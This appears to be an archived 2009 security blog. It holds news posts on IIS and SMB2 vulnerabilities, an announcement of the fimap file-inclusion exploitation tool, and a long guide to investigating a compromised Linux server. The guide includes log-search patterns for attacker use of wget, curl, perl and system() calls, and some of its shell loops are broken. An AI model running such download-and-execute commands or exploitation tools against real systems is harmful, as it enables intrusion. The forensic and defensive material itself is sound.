Monday, September 14, 2009

NSMnow – 1.5.0

NSMnow 1.5 series sees the initial completed feature set for Fedora, RHEL and CentOS systems. This is excellent news for those who have wanted to have, use, test an NSM configuration for themselves but were daunted by the process of doing from scratch.

With this being initial release for support to Fedora, RHEL, and CentOS systems there is bound to be some teething problems. So as long as you submit the bug reports, we will fix them and NSMnow will continue to get even better, if that’s possible.


iPhone anti-phishing sigs only slightly delayed

A number of security experts initially criticized Apple's latest security feature for the iPhone, only to find -- 24 hours later -- that the issues were mostly moot.

On Thursday, Apple highlighted the anti-phishing features of its popular mobile device, the iPhone, at a San Francisco product launch event. However, several security experts tested the feature only to find that phishing sites blocked by Safari were still loaded by the iPhone's mobile browser. Yet, by Friday, the issue appeared to have been mostly been fixed.

It's likely that the lists of sites to be blocked had to be updated by Apple, and that took time, said Michael Sutton, vice president of security research for Web security firm Zscaler.

"Over time, more sites are being blocked," Sutton said. "The issue is likely not the blocking, but the updates."

On Saturday, Apple confirmed that updates to the iPhone are not necessarily in real time.

"Safari's anti-phishing database is downloaded while the user charges their phone in order to protect battery life and ensure there aren't any additional data fees," the company said in a statement sent to SecurityFocus. "After updating to iPhone OS 3.1 the user should launch Safari, connect to a Wi-Fi network and charge their iPhone with the screen off. For most users this process should happen automatically when they charge their phone."

Sutton commended Apple for its attention to security on the iPhone.

"If you look at mobile phones, they have very little security," he said. "So it's good that Apple has taken this step."


Sunday, September 13, 2009

Hack In The Box Security Conference 2009 - Malaysia

Date: 5-8 October 2009
Venue:Crowne Plaza Mutiara Kuala Lumpur,Jalan Sultan Ismail,50250 Kuala Lumpur

HITBSecConf is the premier network security event in Asia and the Middle East. The main aim of our conference is to enable the dissemination, discussion and sharing of deep knowledge network security information.

You can see details here:

Thursday, September 10, 2009

Hackers already exploiting IIS flaws

Microsoft has revealed that hackers are already exploiting newly disclosed vulnerabilities in its Internet Information Services (IIS) web server software.

Exploit code for the first flaw was posted on Monday, allowing hackers to remotely take control of an IIS 5.0 server. New code was then posted on Thursday which takes advantage of vulnerabilities in IIS 5.0, IIS 5.1, IIS 6.0 and IIS 7.0 to allow hackers to launch denial-of-service attacks against these systems, as long as they are running the FTP Service, said Microsoft.

The company was forced to update its security advisory warning that it is now seeing "limited attacks that use this exploit code".

"Microsoft is actively monitoring this situation to keep customers informed and to provide guidance as necessary," the advisory continued.

Microsoft is due to release its September security updates on Tuesday next week, but it is widely believed that the new vulnerabilities were disclosed too recently for the Microsoft security team to deliver a working fix.

Microsoft blamed the current, albeit limited, attacks on the fact that the original vulnerabilities were published on the internet before the firm had a chance to work on a resolution.

"We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone's best interests," said the firm in a blog post.

"This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed."

How to Investigate a compromised Linux Server

This article will assist you with a preliminary investigation of a server compromise. If the server appears to have been compromised at the root level, the server is to be considered compromised until it is rebuilt. This is not to say that you have to rebuild just because an intruder gained access to an un-privileged account. You must identify how the server was compromised, so you can patch those areas.

Note: Don't get distracted with what you find, focus on gathering as much information as possible before disturbing the environment
Identify Who is on the Server

Look for suspicious logins. If the customer always logs in from a DSL line in California and then suddenly logs in from Japan, you may want to make note of that.

#w && echo "netstat listing" && netstat -nalp |grep ":22 "
#last -a
#zgrep ssh /var/log/secure* |grep Accept
#zgrep ftp /var/log/secure* |grep Accept

Identify current network activity:
#netstat -nalp

View IP Connection Count
The following command will tell you how many connections are being made to the webserver on port 80.
Replacing :80 , with the port of your application will allow you to see the number of connections associated with any service. If you are using IPv6, replace cut -f1 -d: with cut -f4 -d:
#netstat -plant | awk '$4 ~ /:80$/ {print $5}' | \
#cut -f1 -d: | \
#sort | uniq -c | sort -n

What is the state of the current connections?
#netstat -plant | \
#awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n

Type, and process name:
#netstat -plant | \
#awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' | \
#sort | uniq -c | sort -n| tail
1 LISTEN xinetd
2 LISTEN memcached
2 LISTEN slapd
2 LISTEN smbd
3 LISTEN httpd
3 SYN_SENT firefox
11 ESTABLISHED firefox

List Open Files
In Linux everything is a file, including network connections:
#lsof -i -n

To view the numeral port number, as opposed to the service name
#lsof -nPi

What Processes are Running?
#ps -elf
#ls /proc/*/exe -la

Sometimes process will hide them selves well enough that our shell scripts aren't gonna pick up the process. In these instances I use unhide:
Compile Unhide:
$ wget
$ tar xzf unhide20080519.tgz
$ cd unhide-20080519/
$ cc unhide-tcp.c -o unhide-tcp
$ chmod o+x unhide-tcp
$ cc unhide-linux26.c -o unhide
$ chmod o+x unhide
$ mv unhide* /usr/sbin

Using Unhide:
$ unhide-tcp
Unhide 20080519

Starting TCP checking

Starting UDP checking

$ unhide proc
Unhide 20080519

[*]Searching for Hidden processes through /proc scanning

Found HIDDEN PID: 740

Found HIDDEN PID: 775

Found HIDDEN PID: 1004

Found HIDDEN PID: 2996

Found HIDDEN PID: 26921
Command: ./123qwelb

Found HIDDEN PID: 27109
Command: ./123qwelb

Found HIDDEN PID: 27213
Command: ./123qwelb

Found HIDDEN PID: 27216
Command: ./123qwelb

Found HIDDEN PID: 27284
Command: top

Check Binary Files

Often times malicious users will replace system binaries with modified copies which will leave back-doors for the attacker to use in the event that the original vector of attack is corrected.

You can use the command strings to view the text data in a binary file. As such you can use this as a way to determine if a binary has been modified in any way.

Compare the output of the following command with that of a known good server:
#strings /usr/bin/top

Investigate Process Activity

Wanna see what a process is doing? Run the following command replacing $PID with the actual process id:
#strace -p $PID


In the simplest case strace runs the specified command until it exits. It intercepts and records the system calls which are called by a process and the signals which are received by a process. The name of each system call, its arguments and its return value are printed on standard error or to the file specified with the -o option.

The -p flag allows you to attach strace to an already running process.
Suspicious Files

Are suspicious files located in the world writeable directories?

The next thing you want to look at are the directories that are world writeable. More often than not, the intruder is not a hacker at all, but a worm that is spreading through the internet. Many attacks will store a binary or will leave behind other temporary files. The three most common directories to search in are /tmp, /var/tmp, and /dev/shm.

#ls /tmp -lab
#ls /var/tmp -lab
#ls /dev/shm -lab

Many times you will find that the worm/intruder will try to hide subdirectories in ways that make it hard to find how to enter the directory. Using the tab key for the auto-complete often helps. Here are some examples of what to look for:
root:~# ls -la
total 2
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32
drwxr-xr-x 5 nobody nobody 120 2005-11-25 18:32 .
drwxr-xr-x 33 nobody nobody 2320 2005-11-25 18:31 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:31 ...

Point(s) of Entry

Simply cleaning a server will not prevent a future compromise. We need to help the customer identify the point of entry to protect the customer, and our network.

Many times vulnerable web scripts (php, perl, etc) are exploited and commands are then executed on the server as the web user. We are going to want to use grep to search the apache logs for some common commands that are often used by intruders.

You will want to use different commands depending on what control panel software the server is running

No control panel
for i in `locate access_log` ;
echo $i ; egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' $i ;

You may have to look in the customer's VirtualHost container to ascertain the real name of the log file.

The following code will check if any system functions were called using the webserver:
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /usr/local/apache/logs/*
The next command searches for XSS vulnerabilities (with the added benefit of searching for positive HTTP status codes):
awk '$7 ~ /http/ {print}' /usr/local/apache/domlogs/*/access_log | awk '$9 ~ /[2-3]/ {print}'

egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20'/home/virtual/site*/fst/var/log/httpd/*

egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/*/statistics/logs/*

On servers with a large number of sites, running the previous command will give you an argument list too long error. Try this instead:
for i in `ls /var/www/vhosts`; do
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/$i/statistics/logs/access_*log 2/dev/null;

egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/log/httpd/*

To locate XSS vulnerabilities try:
awk '$7 ~ /http/ {print}' /var/www/vhosts/*/statistics/logs/access_*log | awk '$9 ~ /[2-3]/ {print}'

This command searches the URI string for the text http. URIs with a protocol identifier in them often times indicate a XSS attack. However some applications such as WordPress, among others, can result in false positives. Additionally this command will only return results for requests with a positive reply code, indicating a successful request to the web server.

Keep in mind that not all results mean the server has been compromised, it takes some interpreting. You want to look for obvious things such as calls to wget to download a file, or a call to perl that looks out of place. You may come up with some false positives so using grep to cut 404's and 400's out may be a good idea. You can do this by tacking a "| grep -v 404" on to the end of any of those commands.

Document all of your findings!
Wrap Up

Root Compromise
If you determine that an attacker has gained root access you will need to contact your sales representative, to have a replacement server built. There is no way for you to guarantee that a server will be 100% safe after a root compromise.

Ideally you should upload your sites to the new server from a local backup, however we can attempt to clean up the sites as best you can if local backups are not available.

User Compromise
If your investigation determines that the server was not compromised at the root level, then it should be safe to remove the compromised files, if any, and inform the customer of your findings, along with recommendations to prevent this issue from recurring.


Wednesday, September 09, 2009

Vista/2008/Windows 7 SMB2 BSOD 0Day

This vulnerability affecting Microsoft SMB2 can be remotely crashed with proof-of-concept code that has been published.This vulnerability affects Windows 7/Vista/Server 2008. The exploit needs no authentication, only file sharing enabled with one 1 packet to create a BSOD. We recommend filtering access to port TCP 445 with a firewall.

More details,

Friday, September 04, 2009

Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service

There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.

This is the steps how to exploit it:

fimap-A little tool for local and remote file inclusion auditing and exploitation

fimap is a little python tool which can find, prepare, scan, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's is currently under heavy development but it's usable.

fimap is currently under development but still usable. Feel free to test it!
This document and tool is not recommend for people who doesn't know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.

You can download it here: